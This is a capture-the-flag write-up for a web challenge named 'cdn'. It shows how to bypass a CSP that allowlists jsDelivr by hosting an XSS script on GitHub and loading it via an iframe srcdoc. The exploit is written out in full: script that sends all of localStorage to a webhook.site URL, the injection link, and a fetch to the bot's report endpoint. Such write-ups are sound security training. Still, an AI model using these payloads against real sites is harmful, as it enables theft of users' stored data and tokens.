cdn
This challenge was available at http://6b.vc:9007. Its source was available: cdn.tar.gz
It is very similar to babyXSS. The XSS vulnerability is the same, but:
@app.route('/')
def index():
nonce = int(time.time())
response = Response(render_template('index.html', nonce=nonce))
response.headers['Content-Security-Policy'] = f"default-src cdn.jsdelivr.net 'self'"
return response
There is a Content-Security-Policy header, which does not allow us to execute inline-scripts or use eval. The CSP only allows us to load scripts from cdn.jsdelivr.net.
Fortunately for us, we can publish anything on jsDelivr.
jsDelivr allows us to load scripts from NPM and GitHub. I choosed to use GitHub for this challenge, because it’s the most convenient solution. I created a repository and created my XSS
const flag = JSON.stringify({ ...localStorage })
window.parent.document.location = `https://webhook.site/40a6771d-b79d-4ea5-bbb3-df68cdcf56b7?flag=${encodeURIComponent(btoa(flag))}`
I also can’t use img tags for this challenge because you cannot load a remote script with an img tag
const payload = `<iframe srcdoc="<script src=https://cdn.jsdelivr.net/gh/manaf941/polygl0ts@main/cdn.js></script>"></iframe>`
console.log(`http://6b.vc:9006/?search=${encodeURIComponent(payload)}`)
Solution
The following link will make the bot send us the flag.
http://localhost:9006/?search=%3Ciframe%20srcdoc%3D%22%3Cscript%20src%3Dhttps%3A%2F%2Fcdn.jsdelivr.net%2Fgh%2Fmanaf941%2Fpolygl0ts%40main%2Fcdn.js%3E%3C%2Fscript%3E%22%3E%3C%2Fiframe%3E
We can trigger the /report endpoint by either using curl or by using the following javascript code in the browser’s console.
fetch("/report?url="+encodeURIComponent("http://localhost:9006/?search=%3Ciframe%20srcdoc%3D%22%3Cscript%20src%3Dhttps%3A%2F%2Fcdn.jsdelivr.net%2Fgh%2Fmanaf941%2Fpolygl0ts%40main%2Fcdn.js%3E%3C%2Fscript%3E%22%3E%3C%2Fiframe%3E"))
We receive the flag on the webhook:
flag{currently 16:40, meeting in 20 minutes, didnt test the challs yet so I really hope everything goes well}